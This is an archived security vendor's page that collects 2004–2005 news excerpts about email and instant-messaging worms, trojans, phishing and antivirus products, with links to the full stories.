Brochure
Best Practices

I.S. Sentry, Inc.
Information Systems Perimeter Security
Sales@ISSentry.Com

"So much is coming out so fast that the biggest hole now for companies and individuals keeping their virus signatures updated is the smaller and smaller window we have to figure out a virus and post a signature change," said Hinojosa. "Now it's typical that we have just a few hours of opportunity to get something out." - F-Secure

Virus News

IM Targeted by Two New Threats (CSO Online) 05/26/05
PC World reports that users of instant messaging applications from Yahoo and America Online are being warned this week of two new threats spreading via IM. The first is a worm targeting AOL’s Instant Messenger software that could potentially allow an attacker to gain control of a user’s system, according to security researchers. The other is a phishing scam propagated through Yahoo Messenger, which tries to lure users into revealing their Yahoo credentials. [Click here for Full Story]

Microsoft's Aim is Antivirus (smallbiz pipeline) 05/20/05
Microsoft is at work on enterprise antivirus, antispyware and other managed services to complement its recently announced Windows OneCare for consumers and small businesses, sources said.

The Redmond, Wash., software giant confirmed that it has an enterprise antivirus service in development, but other sources said Microsoft is developing a broad managed services platform that will also consist of antispyware and possibly Domain Name Service hardening, Wi-Fi provider ID assurance and firewall services for e-mail filtering.

Sources said there may be two "flavors" of the enterprise security services offered, one for enterprise customers and one for Microsoft Business Solutions targeting the SMB market. They said the services will be bundled into licensing agreements and also offered on a subscription basis.

"Initially, it will be antivirus, but there are ambitions to move beyond this as new hardware rolls out," said one partner, who requested anonymity. "The long-term aim is to have a comprehensive manageability platform. [Click here for Full Story]

Aggressive, Mass-Mailed Sober.p Worm Poised to Smack Users (smallbiz pipeline) 05/20/05
Monday may be a very bad day, a security researcher said Friday as he warned that the aggressive Sober worm of early May is timed to download new code the first day of next workweek.

Sober.p, the mass-mailed worm that spread voraciously by virtue of its offer of free World Cup tickets, is poised to launch another attack Monday, said Dmitri Alperovitch, a research engineer with an Alpharetta, Ga.-based security firm CipherTrust.

"At the moment, the payload is unknown, but it may be another form of spam, like Sober.q; more malicious code, like another virus; or a denial-of-service attack."

Starting last weekend, Sober.p-infected machines were sent a Trojan horse, dubbed Sober.q by anti-virus vendors, that spewed out large amounts of right-wing German hate mail. [Click here for Full Story]

Microsoft Plans Enterprise Antivirus Effort (security pipeline) 05/17/05
Microsoft plans to deliver antivirus technology to its enterprise customers in the future, a key Microsoft security executive confirmed Tuesday.

During the company's monthly security briefing, a key security executive confirmed that Microsoft intends to make available for its large corporate accounts antivirus like the one that will be part and parcel of the Windows OneCare service for small businesses and home users that was unveiled May 13.

"We'll have an enterprise version," but Microsoft needs to offer centralized management capabilities before launching such a service for corporate customers, said Mike Nash, corporate vice president of Microsoft Security Business & Technology Unit. He declined to provide additional details about an enterprise version or when it would launch.

The Windows OneCare service, formerly code-named A1, is expected to move into its first round of beta testing this summer and full public beta later this year, Microsoft security executives said during the briefing on Tuesday. [Click here for Full Story]

Sober Worm Hides From AV Scanners (smallbiz pipeline) 05/11/05
One of the reasons why the Sober.p worm continues to spread is because of the way it hides from some anti-virus scanners, a Russian security firm said Wednesday.

Sober.p--also called Sober.s, Sober.o, and Sober.v by various anti-virus companies--includes a mechanism that prevents other programs from accessing its files, said Moscow-based Kaspersky Labs. That presents problems for some anti-virus software.

The tactic has been seen in previous Sobers, said Kaspersky, but it's been refined so that no applications, not even those running under a SYSTEM account, can access them.

"If something can't be scanned, then malicious code can't be detected," Kaspersky said in an online alert. "This rules out the chance of Sober being detected while running an on-demand scan." [Click here for Full Story]

Sober Hadn't Slowed, Still Accounts for 4 of 5 Worms and Viruses (smallbiz pipeline) 05/05/05
Sober.p, the worm that stormed the Internet Monday, showed no signs of fading away as of Thursday morning, an anti-virus vendor said.

"It's had quite the impact," said Graham Cluley, a senior technology consultant with Sophos. "Although it's not on the level of a really major worm, like Sobig of last year, Sober is the biggest we've seen so far this year."

The worm broke Monday and quickly gained steam in Western Europe before hitting American PCs. Within hours it dominated the malware charts by making up 70 percent or more of the malicious code traffic spotted by anti-virus monitoring stations.

Contrary to some analysts' expectations, Sober hasn't yet slowed. It's been spotted in 40 countries so far, said Cluley, and currently accounts for 79.6 percent of all worms and viruses making the rounds.

"Sober is very much hanging in there," said Cluley. "Right now, it's accounting for 5.3 percent of all e-mail, legitimate or otherwise. Over 1 in 20 e-mails, in other words, is Sober. That's ferocious."  [Click here for Full Story]

Another Sober Worm Spreading Quickly (desktop pipeline) 05/03/05
Another version of the dual-language Sober worm hit the Internet mid-day Monday, and by Tuesday was accounting for a stunning 70 percent of all malicious code traffic according to one anti-virus vendor.

Sober.p -- also called Sober.n and Sober.o in the confusing mishmash that's the naming structure of worms and viruses -- is epidemic in Western Europe, said two firms there, Sophos and Kaspersky Labs. Although the worm hasn't made as much headway in the U.S., it's currently the most dangerous new threat on the books, according to Symantec and McAfee, both of which raised their alert warnings to "medium" on Monday afternoon as Sober spread.

"It's currently running at about 70 percent of all mail traffic, worldwide, but it seems to have plateaued," said Ted Anglace, a senior security analyst in Sophos' Boston office. "It's leveling off."

Like earlier Sober variations, this one is bilingual -- it uses both English and German headings and text -- and spreads by mass mailing copies to addresses it steals from detection technologies. [Click here for Full Story]

Panda TruPrevent Claims 'Zero Day' Virus Protection (desktop pipeline) 04/28/05
Panda Software had introduced TruPrevent 2.0, an anti-virus and security technology that it claims can identify and remove new viruses and spyware without depending on signature files or databases of known threats.

According to the company TruPrevent can recognize and eliminate viruses, spyware, adware, Trojans, worms, "bots" and even hacker attempts, yet it requires no tuning, training or updates.

"The traditional signature- and rules-based products from competitors like Norton and McAfee were adequate back when they were invented in the era when viruses took days, weeks or even months to propagate on floppy disks and 'sneaker-nets,' but now malware can travel around the world in minutes on the Internet," said Patrick Hinojosa, CTO of Panda Software USA, in a statement. "Panda Labs developed TruPrevent to protect users from this new kind of malware threat -- 'flash' viruses and 'zero day attacks' -- malicious software that can attack instantaneously and globally." [Click here for Full Story]

Bagle Worm Seen as 'Blueprint' For Web Criminals (desktop pipeline) 04/28/05
A pair of research reports have explored the long-running Bagle worm and laid out a chronology that points to a professional developer who, like counterparts in the commercial software world, is constantly testing, tweaking, and improving his code for profit, not pride of ownership.

The Bagle worm debuted in mid-January 2004, and according to most anti-virus firms, has been spotted in 60 to 100 variations since then. It's also usually credited with starting the malware-for-profit movement among hackers, who prior to the ground-breaking worm, typically were motivated by notoriety.

Jason Gordon, an analyst with security research firm infectionvectors.com by night, a security consultant to Department of Defense clients by day, spent the last year watching each edition of Bagel, and recently completed the final third of a three-part report.

"In the year since its release," he wrote in that report, "Bagle has had a major impact on the Internet" primarily because it was, and remains, "a leader in the nefarious Web economy of spamming, phishing, and stealing passwords." [Click here for Full Story]

Trend Micro Virus Update Freezes PCs (desktop pipeline) 04/25/05
Security vendor Trend Micro distributed a faulty virus definition file on Friday that slowed thousands of PCs worldwide to a crawl, the company admitted Monday.

The virus definition file was released Friday at about 3:30 p.m. PDT to both the Trend Micro Web site (where users could retrieve it manually) and to the firm's automatic update servers. The file was to update Trend Micro's OfficeScan, PC-cillin, ServerProtect for NT, Client/Server Suite for SMB, and Client/Server/Messaging Suite for SMB.

Rather than simply update the anti-virus files, however, the new definition brought machines to their knees by chewing up virtually every processor cycle.

"We confirmed that a virus pattern file which we distributed on April 23, 2005, from 7:33 a.m. to 9:02 a.m., Tokyo Local Time, significantly slowed the performance of our customers' computers and in some cases made their computers inaccessible," said Trend Micro in a statement from its Tokyo office on Monday. "This trouble was caused by insufficient work in compatibility testing of the product with the operating system before it was released." [Click here for Full Story]

McAfee: Unpatched Machines a Major Security Threat (desktop pipeline) 04/25/05
Hackers will keep cranking out exploits that take advantage of known software vulnerabilities because, although patches are available, a minority of machines are fixed, security vendor McAfee said Monday.

In releasing its quarterly security analysis, McAfee's "AVERT" virus research team noted that exploited vulnerabilities are becoming a dominant threat to both consumers and enterprises.

"The day of the virus may have come and gone," said Vincent Gullotto, the vice president of AVERT. "One day it may swing back, but now we're looking at different types of programs, not viruses, that threaten computers. And many of them are exploiting machines' vulnerabilities."

According to AVERT's estimates, half or more of the computers connected to the Internet aren't properly patched or updated. Not good, especially when the number of vulnerabilities spotted in the first quarter of 2005 was up 6 percent over the same quarter last year. [Click here for Full Story]

Worm Lull, Windows XP SP2 Keeping Outbreaks at Bay (smallbiz pipeline) 04/22/05
E-mailed worms pose less of a threat and Microsoft has been lucky so far, said a virus researcher Friday in explaining why 2005 has been relatively quiet on the security front.

"2004 was distinguished by a number of major epidemics caused by e-mail worms such as MyDoom, NetSky, Bagle, and Zafi," said Alexander Gostev, a senior analyst with Moscow-based Kaspersky Labs, in a report he authored on the security situation for the first quarter of the year.

"However, late 2004 and early 2005 were free of such outbreaks, with nothing on the scale of even the mid-sized outbreaks of 2004," Gostev added.

The decline in destructive power of e-mailed worms may be due to anti-virus vendors developing new technologies to address them, including detecting worms in compressed .zip files and pre-scanning messages with executable attachments, but he also gave credit to Microsoft for patching several Outlook and Outlook Express vulnerabilities. He even tipped his hat at the press for banging the security drum. [Click here for Full Story]

Hackers Use Blogs to Spread Worms, Keyloggers (smallbiz pipeline) 04/13/05
Blogs aren't just for blabbing to friends and family, said a security and content filtering firm Wednesday, but increasingly are being used as a safe haven by hackers for storing and distributing malicious code, including identity-stealing keyloggers.

"We're seeing that more and more of the locations where malicious code is stored is on blog sites," said Dan Hubbard, the senior director of security and technology research for San Diego-based Websense. So far this year, Hubbard said, his lab has discovered hundreds of blogs involved in the storage and delivery of harmful code.

"In particular, keyloggers and other Trojan downloaders and droppers are being stored and updated from blog sites," Hubbard added. A keylogger is the term for a type of spyware that watches for, records, then transmits to the hacker identities surreptitiously hijacked from PCs. [Click here for Full Story]

Tip Sheet: How to Protect Against a Zero-Hour Attack (smallbiz pipeline) 04/15/05
Here are six good ideas for keeping your computer systems safe from viruses and worms. By Rob McCarthy Courtesy of TechLearning

In the last year, a series of viruses and worms that caused damage across the Internet in record time has made very clear how vulnerable our computer systems are. The MS Blaster, Slammer, Sasser, and Korgo.W worms have shown that signature-based antivirus software and traditional firewalls are not enough to protect networks. Everyone is worried about a zero-hour attack — an attack based on a previously unknown vulnerability and completely immune to antivirus software. What can you do to protect your network from such an event? Here are a few ideas: Use file integrity checking. [Click here for Full Story]

New MSN Messenger Stops Some Worms (desktop pipeline) 04/08/05
Tucked inside the just-released MSN Messenger are features to stymie the spread of some of the IM worms that have been knocking Microsoft's instant messaging clients, a security firm said Friday.

MSN Messenger 7, said Moscow-based Kaspersky Labs in its analysts' blog, now blocks .pif files, which have been used by IM worms such as Kelvir and Bropia that have targeted Microsoft's IM software.

"Any incoming or outgoing message with a .pif will be blocked completely," said Kaspersky.

Unfortunately, MSN Messenger 7 doesn't let users know this. "Messages won't get delivered to the recipient, but neither the recipient nor sender will be notified that the message has been blocked," continued Kaspersky. [Click here for Full Article]

Mytob Worm Family Just Keeps Growing (desktop pipeline) 04/11/05
The Mytob worm family has grown by leaps and bounds -- half a dozen variants just this past weekend -- and is a marker of the trend toward more-more-more by virus and worm writers, a security analyst said Monday.

Since its debut about six weeks ago, 40 Mytob variants have appeared, a new record for a worm in the quantity count.

"The writer or writers of Mytob have been very busy creating variants," said Graham Cluley, an analyst with the U.K.-based anti-virus vendor Sophos. "They're trying to get it past anti-virus defenses by making small changes, and constantly tweaking it."

The half-dozen versions that rolled out over the weekend, said Cluley, point out the lengths to which virus writers will go to sneak by defenses. "The writers will produce a version, which is then detected by anti-virus labs, then the writers create a new version to top the last one. In the case of those over the weekend, they were similar enough that we could say they were all from the Mytob family, and detect them with a generic signature already in place."  [Click here for Full Article]

Symantec's Anti-Virus Vulnerable To Denial-of-Service Attacks (security pipeline) 03/29/05
Symantec's Norton AntiVirus line has a pair of vulnerabilities that hackers could exploit to crash or hang a targeted PC, Symantec announced Monday.

The Cupertino, Calif.-based security company's consumer AntiVirus 2004 and AntiVirus 2005 series are at risk, said Symantec, as well as the Internet Security and SystemWorks lines, which bundle AntiVirus with other security or PC maintenance tools.

Errors can be forced, said Symantec, by attackers feeding specific file types to a machine protected by AntiVirus' Auto-Protect module, or by renaming a file on a network share that's then scanned by Auto-Protect. (Auto-Protect is Symantec's name for the real-time scanner that sniffs through files as they're opened or downloaded.)

The errors can cause the PC to either slow down to the point of being unusable, then crash, or hang, forcing its user to reboot. [Click here for Full Article]

Are Wireless Virus Threats for Real This Time? (security pipeline) 03/07/05
E. Kelly HansenDoomsday scenarios regarding PDA and wireless viruses have been circulating since 2000, when the first PDA-specific virus, Phage 1.0, surfaced. 2001 was to be the year of the wireless virus, according to both IDC and Gartner. Four years later, the soothsayers are back, proclaiming the dangers of these airborne attacks. Should we listen this time?

Last year, two new worms surfaced--skulls.a and cabir.a--that had a far greater impact on the popular psyche than on systems. Cabir.a was clearly devised as a proof of concept. The worm's only danger was that it dramatically reduced battery life for Bluetooth devices. Why were these harmless viruses being trumpeted as signs of a forthcoming mobile Armageddon?

It turns out certain Bluetooth smartphones can be hijacked so the attacker controls the device and, unbeknownst to the user, can dial a third party. This attack can turn a smart phone into a remote bug, broadcasting conversations from an unsuspecting user's pocket. And in August 2004, a team at Flexilis, a wireless research and development company, created a device called the bluesnarf rifle, which could target Bluetooth smartphones from more than a mile away. [Click here for Full Article]

Virus Writers Have Little to Fear (security pipeline) 03/07/05
Virus writers have little to fear, a security firm said Monday, and know they can practice their craft with near impunity.

The most recent Bagle explosion "shows once again how helpless legislation is in the face of cybercrime," said Moscow-based Kaspersky Labs in a statement posted to its security site. "Cybercrime laws are local, and are specific to individual countries. But virus writers aren't constrained by national boundaries."

In particular, the plague of Bagle variants has Kaspersky researchers convinced that the authors of several worm families are in cahoots.

"It's become clear that the authors of Bagle, Netsky, Zafi, and a whole range of other malicious programs are working closely together. They may not know each other personally, but they're all using information from the author of Bagle to send out their creations." [Click here for Full Article]

McAfee Revamps Hosted Antivirus Service for SMBs (smallbiz pipeline) 03/04/05
In an effort to resurrect its maligned managed security service effort, McAfee will unveil this week a new service to provide small and midsize businesses with hosted antivirus protection.

Available only to solution providers in McAfee's Security Alliance partner program, the new Partner Security Service gives solution providers a more flexible contract under which to work and offers expanded upselling opportunities, the partners said.

Based on the latest McAfee Managed VirusScan technology, the new service is a revised take on McAfee's VirusScan ASaP, which has long prompted complaints from partners. Partner Security Service includes Web-based administration and reporting, spyware detection and rapid-response technical support through McAfee's Avert division. [Click here for Full Article]

Virus Writers Laugh at Laws (smallbiz pipeline) 03/07/05
Virus writers have little to fear, a security firm said Monday, and know they can practice their craft with near impunity.

The most recent Bagle explosion "shows once again how helpless legislation is in the face of cybercrime," said Moscow-based Kaspersky Labs in a statement posted to its security site. "Cybercrime laws are local, and are specific to individual countries. But virus writers aren't constrained by national boundaries."

In particular, the plague of Bagle variants has Kaspersky researchers convinced that the authors of several worm families are in cahoots.

"It's become clear that the authors of Bagle, Netsky, Zafi, and a whole range of other malicious programs are working closely together. They may not know each other personally, but they're all using information from the author of Bagle to send out their creations." [Click here for Full Article]

New IM Worm Hit MSN Messenger (desktop pipeline) 03/07/05
New worms spreading through MSN Messenger -- and its bundled-with-Windows Windows Messenger version -- via links to a malicious site are infecting users and leaving their PCs open to hacker hijack, security vendors reported Monday.

The new worms, tagged as Kelvir.a and Kelvir.b, appeared over the weekend and on Monday, respectively, anti-virus vendors said. Both use the same mechanism to attract users and infect Windows-based PCs: they include a link in the instant message. That link, in turn, downloads a malicious file -- the actual worm, a variant of the long-running Spybot -- which opens a backdoor to the compromised machine.

Kelvir spreads by sending itself to all the MSN/Windows Messenger contacts on the infected PC, and poses as cryptic messages such as "lol! see it! u'll like it!" and "omg this is funny!" The link opens a .pif-formatted file.

.pif files are also often a format-of-choice for mass-mailed worms. [Click here for Full Article]

Crafty Bagle Viruses Keep Spreading (cnet) 03/04/05
Late at night on February 28, 2005, two versions of the Bagle virus were released onto the Internet. That event, in itself, wasn't too remarkable, given that the source code for the Bagle virus is widely available on the Internet today, and we've seen about 50 variations of Bagle since its inception in early 2004. However, the two new variations of Bagle were responsible for spreading four new versions of a Trojan horse. Oddly, these Trojans don't include mechanisms to spread beyond the infected computers, which seems counterintuitive (at first).

Defies viral definition, perhaps My own definition of a computer virus includes the mention that the malicious code can't spread by itself. To spread, someone has to e-mail the infected code or otherwise share those files with others. Over the last five years, we've grown used to automatic mailers combined within the infected e-mail attachment viruses such as I Love You. The automatic mailers are little SMTP engines that send out perfect copies of themselves--viral-infected e-mail sent to addresses harvested from infected computers. And we've also grown used to the computer worm, malicious code that by definition exists to move from computer to computer, often scanning the Internet for vulnerable systems to infect. So, how bad is a viral e-mail message with a Trojan horse that can't spread? Plenty bad. [Click here for Full Article]

Multiple Versions of Bagle Trojan Swamp Antivirus Defenses (smallbiz pipeline) 03/01/05
A major wave of Bagle-like Trojan horses hit users worldwide Tuesday with numerous variations that aim to overwhelm anti-virus defenses by morphing faster than research labs can release new signatures.

The attack, which began about midnight EST, was launched in a large-scale spamming campaign, said virus researchers, and although the new threat doesn't spread on its own -- these are Trojans with Bagle characteristics, not true worms -- many security vendors have bumped up warnings to get out the word.

It's unclear how many variations are at loose. Some vendors, such as Symantec, had reported only two as of mid-morning Tuesday. Others, such as the U.K.-based Sophos, said there were at least four or five distinct versions. According to Reston, Va.-based iDefense, some sources are reporting as many as 15 copy-cats.

"Wave attacks are becoming increasingly common," said Ken Dunham, iDefense's director of malicious code research, in an e-mail to TechWeb. "Multiple minor variants are rapidly seeded into the wild to help the overall success of the attack." [Click here for Full Article]

Predicted Wave of Worm Hits, then Dissipates (smallbiz pipeline) 02/22/05
The predicted wave of MyDooms continued through the weekend, security firms reported, and a new edition of Sober, the German-made worm that continues to bedevil users, made the rounds with some success.

Last week, when MyDoom.bc appeared, a security analyst at Computer Associated noted that the worm had a history of rolling out several variants in succession, then taking a break. "MyDooms usually come in a string of four or five in a row that use essentially the same code," said Sam Curry, vice president of Computer Associates' eTrust security group, last Thursday.

That's exactly what happened. Late Friday and over the weekend, McAfee tracked three new copy-cats, and dubbed them MyDoom.bd, MyDoom.be, and MyDoom.bf. Like Thursday's MyDoom.bc, the .bd and .be variants were tagged as "medium" threats by the Santa Clara, Calif.-based anti-virus vendor.

The new variations are virtually identical to MyDoom.bc, and even earlier editions going back as far as the summer of 2004 and MyDoom.o, said analysts Tuesday. [Click here for Full Article]

New Sober Worm Spreading Quickly (PC World.Com) 02/22/05
A new version of the Sober worm wriggled out of its hole early on Monday and set about quickly attacking computers in Europe and the U.S., a security services company says. The worm is a mass-mailer, meaning it spreads itself via e-mail using contacts listed in the address books of computers it infects.

The first instance of the worm, called W32.Sober-K-mm, was intercepted by U.K. security company MessageLabs. The company detected 663 instances of the worm in the first hour, and the figure climbed quickly to more than 2,200 instances over the next five to six hours, prompting MessageLabs to give it a high-risk rating, says Maksym Schipka, a senior antivirus researcher with the company.

"Compared to other Sober worms, it looks to me like this one is spreading itself more aggressively," he says. [Click here for Full Article]

Be Afraid, Be Very Afraid of Valentine's Day E-Mail (smallbiz pipeline) 02/08/05
The days running up to Feb. 14 are when employees are at the greatest risk of running afoul of company e-mail policies, a message firm said Tuesday.

Redwood City, Calif.-based Clearswift warned workers not to fall for the e-mail and Web security pitfalls that are prevalent around Valentine's Day.

Not only is Valentine's Day-oriented spam surging -- hyping flowers and chocolate -- but phishers are active, too, enticing consumers to spoofed Web sites. Hackers also use the holiday, said Clearswift's Pete Simpson, the manager of the company's ThreatLab, to get recipients to open attachments or click on links to purported e-greeting cards.

"Affectionate e-mails, purporting to be from a potential lover, have proven to be effective in tricking people to break security procedures -- taking advantage of [people's] weaknesses," said Simpson in a statement. [Click here for Full Article]

'Dead' Saddam E-Mails Hide a Worm (desktop pipeline) 02/04/05
E-mails claiming to come with photos of Saddam Hussein shot dead while trying to escape custody are spreading a worm that hijacks the PC.

Messages churned out by the Bobax.h worm can arrive with the subject heading of "Saddam Hussein - Attempted Escape, Shot dead Attached some pics that i found," said U.K.-based Sophos.

The attached file, of course, is nothing of the kind, but instead is the worm, which when run, propagates to other machines, tries to disable anti-virus and security software, and installs an e-mail relay module which can be used by remote hackers for sending spam. [Click here for Website]

Antivirus Tools Fool XP's Security Center (PC World.Com) 02/02/05
The McAfee Security Center under Windows XP (news - web sites) SP2 incorrectly indicated that our test machine was fully protected, prior to updating. Microsoft's Windows XP Service Pack 2 is supposed to improve security. Its Windows Security Center should alert you when your antivirus software is missing or out of date. But in our tests, both McAfee's Internet Security Suite 2005 and Symantec's Norton Internet Security 2005 crippled SP2's ability to deliver accurate alerts immediately after installation.

We installed each application on a PC running SP2, and both caused the Windows Security Center to report erroneously that the products were up-to-date. Any antivirus software must be updated immediately after you install it to protect the computer against viruses discovered since the software's initial release.

McAfee and Symantec acknowledge that their products intentionally disable the Windows Security Center's messaging feature. Both companies say the reason for doing so is to streamline customers' experience; neither company plans to alter its practices. [Click here for Website]

MSN Messenger hit by double-whammy worm (cNet) 02/03/05
Trend Micro is warning of a new variant of the Bropia worm that uses MSN Messenger to spread.

The Bropia.F worm is packaged with a second, more damaging worm that tries to exploit poorly patched computers, the antivirus company said on Thursday.

The latest variant of the Bropia worm was discovered on Wednesday evening, Trend Micro said. It infects systems belonging to users of MSN Messenger by sending itself as a picture of a roast chicken with tan lines to all available or online contacts. It also releases a second more dangerous worm, called Agabot.ajc, on the infected computer.

Adam Biviano, a senior systems engineer at Trend Micro, said that although there have only been a handful of reported infections, the company has declared the worm a medium risk, because of its potential to spread and steal users' bandwidth. [Click here for Website]

Mobile Viruses Just Getting Started (smallbiz pipeline) 01/25/05
While viruses that attack phones are few and far between now, when they get traction -- and they will -- the lousy state of security in smart phones means trouble for users and providers, an analyst said Tuesday.

Most of the mobile malicious code that's popped up so far -- such as Cabir, a worm that's spread to several countries via Bluetooth-enabled phones -- isn't dangerous or destructive, said Brian Pellegrini, a wireless analyst with ABI Research.

The sorry state of malicious code directed toward mobile devices, said Pellegrini, is due to the small base of smart phone users. "First of all, there's not a lot of out there [using smart phones] to be infected or start complaining about viruses," he said. "And because the numbers are small, phone are just starting to be noticed by virus writers."  [Click here for Website]

Worm Steals CNN Headlines To Fool Users (desktop pipeline) 01/21/05
A new worm uses breaking news -- and a devious technique to keep itself up-to-date -- to dupe recipients into opening attachments, an anti-virus firm said Friday.

U.K.-based security vendor Sophos said that the Crowt.a worm grabs its subject lines, message content, and attachment names from headlines culled in real-time from CNN's Web site. The worm's subject and attachment filename constantly change to mirror the top headline on CNN.com, while the e-mail message's text is also hijacked from CNN.

The idea is to fool recipients into thinking that they're reading a legitimate newsletter or news brief rather than looking at payload-carrying message about to infect their PC.  [Click here for Website]

Trio Of Pesky 'Firsts' Threaten Computer Users (security pipeline) 01/18/05
The new year's not even three weeks old, and already hackers have logged some troublesome firsts, security analysts said Tuesday.

The first worm that took advantage of the Dec. 26 earthquake and tsunami disasters has appeared, several anti-virus firms warned users Tuesday. Dubbed "Zar.a," the worm uses the subject "Tsunami Donation! Please help" and message copy "Please help us with your donation and view the attachment below! We need you!" to dupe recipients into opening the attachment and launching the worm.

Although Zar.a -- which has been labeled Sun.a by a few security companies -- spreads by hijacking addresses it finds in the Microsoft Outlook address book, it doesn't seem to do any damage or open any backdoors in the infected machine. Instead, it's goal appears to be to launch a denial-of-service (DoS) attack against a hacker Web site. As of mid-day Tuesday, that site was offline. [Click here for Website]

Security Software: Downloads and Trials (Microsoft) 01/13/05
Download antivirus software, firewalls, spyware removal tools, and more to improve the security of your computer and to help keep it running smoothly. From Microsoft Windows XP Service Pack 2 (SP2) Microsoft Windows XP Service Pack 2 (SP2)

Get better protection against viruses, hackers, and worms. This service pack includes Windows Firewall, Pop-up Blocker for Internet Explorer, and the Windows Security Center. Microsoft Windows Antispyware (Beta) Microsoft Windows Antispyware (Beta)

Download our new anti-spyware software to help protect your PC from spyware and other potentially unwanted software. MSN Toolbar MSN Toolbar

Block pop-up ads with Pop-up Guard. Help prevent pop-up windows from appearing while you browse the Web (works with Windows 98 and later). [Click here for Website]

Pre-Christmas Worm Tops December's Chart (Information Week)  01/06/05
The fast-spreading Zafi.d worm, which snuck onto users' PCs by using a holiday greeting customized to the likely language of the recipient, soared to the top of December's list of most common malicious code, security firm Sophos said Thursday.

"Although it was only discovered mid-month, Zafi.d caused major havoc during the holidays, accounting for more than a third of all virus reports in December," said Gregg Mastoras, a senior security analyst Sophos in a statement. "Only 24 hours after it was discovered, Zafi.d accounted for more than 72 percent of all virus reports, and one in ten e-mails were infected by the worm. It's quite alarming to see a virus gain so much traction in such a short amount of time." [Click here for Full Story]

Fast-Acting Hackers Put Out Trojan Attacking IE (Information Week)  12/28/04
It took hackers less than a week to produce a working exploit that attacks a new, unpatched vulnerability in Microsoft's Internet Explorer.

It took hackers less than a week to produce a working exploit that attacks a new, unpatched vulnerability in Microsoft's Internet Explorer, security firms said Tuesday.

Phel.a, a Trojan horse discovered Monday, attempts to exploit the flaw in Internet Explorer 6.0 dubbed "Microsoft Internet Explorer HTML Help Control Local Zone Security Restriction Bypass" that was first made public less than a week before, on December 21. [Click here for Full Story]

New Santy Worm Threatens More Sites (Information Week)  12/27/04
A new version of the Santy worm appeared over the weekend and poses a broader threat than its ancestors.

A new version of the Santy worm appeared over the weekend, and according to analysis done by some security firms, poses a broader threat than its ancestors, which used Google to spot vulnerable Web bulletin boards, then defaced them.

Dubbed Santy.e, the worm differs significantly from its predecessors, said Moscow-based Kaspersky Labs in an alert. Rather than target only those Web sites running phpBB, software for creating Internet forums using the PHP scripting language, the worm can exploit any site that's left allowed arbitrary file inclusion into PHP scripts. [Click here for Full Story]

Google Worm Shows Bad Guys Want Efficiency, Too (Information Week)  12/21/04
A new worm uses the search engine Google to find vulnerable systems, automatically connect to them, and deface a Web site.

Kaspersky Labs, a security software company in Moscow, said Tuesday that it has detected a new worm that uses search site Google to automatically find vulnerable systems. The worm, called Net-Worm.Perl.Santy.a, queries Google to locate Web sites running vulnerable versions of phpBB, which is software for creating Internet forums using the PHP scripting language.

A week ago, the PHP Group, an open-source development organization, issued PHP 4.3.10 and PHP 5.0.3 to close the vulnerabilities this worm exploits. A fix of phpBB, version 2.0.11, was issued in mid-November. [Click here for Full Story]

Zafi Spreads Like Crazy (Information Week)  12/15/04
The Zafi.d worm continued to sweep through the Internet, creating such a flood of messages as it replicated that by one security vendor's estimate, it accounted for 10 percent of the world's mail.

The Zafi.d worm continued to sweep through the Internet Wednesday, creating such a flood of messages as it replicated that by one security vendor's estimate, it accounted for 10 percent of the world's mail. [Click here for Full Story]

New Internet Worm Disguises Itself as Electronic Christmas Card  (AP)  12/14/04
HELSINKI (AFP) - Internet security experts warned of a new virulent e-mail worm particularly successful in infecting computers as it is disguised as a multilingual electronic Christmas card.

"We think this worm will be big, because of its timing and the fact that it comes in 15 different European languages," Mikko Hyppoenen, head of anti-virus research at Finnish firm F-Secure, told AFP. [Click here for Full Story]

Langa Letter: Norton Antivirus and the Single-Layer Defense Fallacy  (Information Week)  12/06/04
A simple hack can disable Norton's script blocker. Fred Langa's solution not only works around that problem, but many others as well.

You may have seen the news that buzzed around the security community several weeks ago: Daniel Milisic posted a sample script that illustrates how easily Symantec/Norton Antivirus' ("NAV") script blocking can be defeated. His sample script does the following:

1) Sets the NAV Auto-Protect Service to "DISABLED" 2) Sets a registry key to uninstall Script Blocking 3) Creates and launches a VBScript file to download a harmless demonstration program 4) Launches the demonstration program 5) Reboots the PC  [Click here for Full Story]

Dial V for Virus (Information Week)  12/06/04
Hacker attacks and growing use of 'smart' cell phones raise new concerns about information security.

When Phil McMurray learned last week that the Cabir Bluetooth worm found an easier way to spread through a symbiotic relationship with the Skulls cell-phone Trojan, he was hardly surprised. McMurray, IT security officer at Advo Inc., a $1.2 billion-a-year provider of direct-mail services, was already in discussions with his security vendors about antivirus software and firewalls for several hundred smart phones and handhelds used by Advo employees. "These types of attacks serve as a catalyst," McMurray says. "We're beginning to take a serious look at these security issues. You don't want to get stuck behind the curve on something like this."  [Click here for Full Story]

HP Works On Software To Slow Computer Worms (Information Week)  12/01/04
Engineers at Hewlett-Packard are working on "virus-throttling" software that they say could slow the spread of Internet-borne viruses and worms.

Engineers at Hewlett-Packard are working on "virus-throttling" software that they say could slow the spread of Internet-borne viruses and worms.

Researchers for the Palo Alto, Calif.-based computer giant said Tuesday that the new software wouldn't destroy threats such as the "Blaster" worm, which crippled more than a million computers last summer.  [Click here for Full Story]

Bofra Worm Spreads by Banner Adds (PC World.Com) 11/22/04
Web site visitors who clicked on banner ads on a number of popular European Web sites this weekend could have infected their computers with variants of the Bofra worm, experts warn.

The attacks take advantage of an unpatched buffer overflow flaw in the way Internet Explorer 6 handles the IFrame tag, and has been confirmed on PCs running Windows XP with Service Pack 1 and Windows 2000 (news - web sites), according to a warning posted Sunday on the SANS Institute Web site. Windows XP Service Pack 2 (SP2) is not vulnerable, it said. [Click here for Full Story]

Trojan Horse Hijacks Browser, Sends Users to Porn Site (Information Week) 11/18/04
Unwary surfers infected by a new Trojan horse may be in for a shock when their browser is unexpectedly redirected to a hard-core porn site.

Unwary surfers infected by a new Trojan horse may be in for a shock when their browser is unexpectedly redirected to a hard-core porn site, a security firm warned Wednesday. The Delf-IT Trojan horse lurks in the background on infected PCs, said U.K.-based Sophos, and waits for the user to visit Web sites that contain one of 50-some trigger phrases, then shunts the browser to a porno page.  [Click here for Full Story]

Warnings On New Phising Threat (Information Week) 11/03/04
New, "more insidious" phishing scam is triggered when unsuspecting users open an E-mail.

Opening the wrong E-mail may soon be enough to empty your bank account. In an effort to woo security-conscious computer users, "phishers" have come up with a new technique to harvest online banking details without requiring users to click on a Web link and enter personal information on a submission form. [Click here for Full Story]

Latest Bagle Virus Remains a Threat (News Factor Network) 11/01/04
Three new variants of the infamous Bagle virus continue to spread after being launched late last week, although the frequency of attacks appears to have leveled off.

